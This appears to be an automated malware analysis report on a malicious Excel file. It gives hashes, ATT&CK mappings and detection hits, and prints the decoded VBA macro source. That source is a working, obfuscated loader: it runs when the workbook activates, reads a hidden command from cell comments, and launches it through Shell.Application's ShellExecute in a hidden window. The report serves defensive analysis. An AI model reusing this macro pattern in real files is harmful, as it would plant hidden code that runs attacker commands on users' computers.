Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f57662fba9ef54de…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 118.5 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2021-06-28
MD5: e1a60d7c0d500b1926d24603e9fae4c5
SHA-1: a9b444a31cf1eedec6688445de3e75b19312723e
SHA-256: f57662fba9ef54debc12e29ac01ce4e1b4d1e257e49cb89158e61e907b77dddb
Risk score: 100

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros. The macros use CreateObject to instantiate a Shell.Application object (the class name is assembled at runtime from three string-returning functions) and then call its ShellExecute method with parameters that appear to be designed to download and execute a second-stage payload; those parameters are read from cell comments in the active sheet rather than being stored in the macro text. The obfuscated function names and string concatenations suggest an attempt to evade detection. The primary technique observed is the use of Visual Basic for Applications (VBA) to interpret and execute commands.

Heuristics (3)

  • Reference to ShellExecute API (severity: high, rule SC_STR_SHELLEXEC)
    Reference to ShellExecute API
  • VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • CreateObject call (severity: high, rule OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched lines in script:
      Set aDqp = CreateObject(dfjkdsf() + klsdk() + wlfff())
      aDqp.ShellExecute "P" + n1, A2, "", "", 0

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1759 bytes
SHA-256: fb60d4704982165e0824a99ad9180d4e6efad25a429fac06b8ea0e57ab22a4e0

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Dim eone, cmUrV, mpQmge

With ThisWorkbook
  eone = .ActiveSheet.Range("D500").Comment.Text
  eone2 = .ActiveSheet.Range("E500").Comment.Text

  mpQmge = UcWqx.jOQHb(eone, eone2)
  End With
End Sub


Function cpZDQUD(Text)
    Dim i As Integer
    Dim CqVKXD As String
    Dim qdeahqaR As String
    qdeahqaR = Trim(Text)
    For i = 1 To Len(qdeahqaR)
      CqVKXD = Mid(qdeahqaR, i, 1) & CqVKXD
    Next i
    cpZDQUD = CqVKXD
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UcWqx"
Attribute VB_Base = "0{94D443CF-D674-4995-96C3-1B11A8856206}{26A8CD68-D36A-4DD7-B1F9-FFE8AE3CEE0C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function jOQHb(A2, n1)
Dim aDqp

Set aDqp = CreateObject(dfjkdsf() + klsdk() + wlfff())
aDqp.ShellExecute "P" + n1, A2, "", "", 0



End Function

Function dfjkdsf()
dfjkdsf = "Shel"
End Function

Function klsdk()
klsdk = "l.Appli"
End Function

Function wlfff()
wlfff = "cation"
End Function